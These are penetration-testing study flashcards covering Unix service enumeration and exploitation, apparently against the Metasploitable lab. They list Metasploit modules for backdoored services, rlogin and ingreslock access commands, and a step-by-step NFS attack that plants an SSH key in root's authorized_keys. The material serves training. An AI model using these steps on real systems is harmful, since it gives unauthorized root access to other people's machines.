Appendix F Flashcards

1
Q

What would the following command do

rusers -l 192.168.1.1

A

Show a list of users currently logged onto the host 192.168.1.1

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

What would the following command do

rwho 192.168.1.1

A

Show a list of users currently logged onto the host 192.168.1.1

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

What port does finger operate on

A

TCP 79

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

How can finger benefit an attacker

A

It can be used to enumerate users

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

What is the correct usage syntax for finger

A

finger user@192.168.1.1

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

What version of VSFTP has a backdoor built into it and can be exploited with a metasploit module

A

2.3.4

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

The vulnerable service distcc can be exploited to gain a shell using what metasploit module

A

exploit/unix/misc/distcc_exec

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Why should Nmap never be installed with special privileges on Linux based operating systems

A

This could potentially make the server susceptible to the Setuid Nmap Exploit

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

What metasploit module should be used to exploit Setuid Nmap

A

exploit/unix/local/setuid_nmap

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

How would you exploit the misconfigured r login service on 192.168.1.1

A

rlogin -l root@192.168.1.1

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

How would you identify an NFS share on 192.168.1.1

A

probing TCP port 2049 or by using the following commands :

rpcinfo -p 192.168.1.1

100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs

showmount -e 192.168.1.1
Export list for 192.168.1.1 :
/*

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

How would you obtain access by mounting an NFS share

A

root@ubuntu:~# ssh-keygen

root@ubuntu:~# mkdir /tmp/r00t

root@ubuntu:~# mount -t nfs 192.168.1.1:/ /tmp/r00t/

root@ubuntu:~# cat ~/.ssh/id_rsa.pub&raquo_space; /tmp/r00t/root/.ssh/authorized_keys

root@ubuntu:~# umount /tmp/r00t

root@ubuntu:~# ssh root@192.168.1.1

Last login: Fri Jun 1 00:29:33 2012 from 192.168.99.128

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

What metasploit module is used to compromise the UnrealRCD IRC daemon

A

exploit/unix/irc/unreal_ircd_3281_backdoor

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

What port does ingreslock reside on and how can it be exploited

A

TCP 1524

Telnet 192.168.1.1 1524

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

What are the R*Services and their corresponding ports

A

rsh : Remote Shell : TCP 514
rauth : Remote Auth : TCP 513
rlogin : Remote Login : TCP 513
rexec : Remote Execution : TCP 512

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

What port does X11 operate on

A

TCP 6000

17
Q

Where is the default .rhosts file location

A

/home/user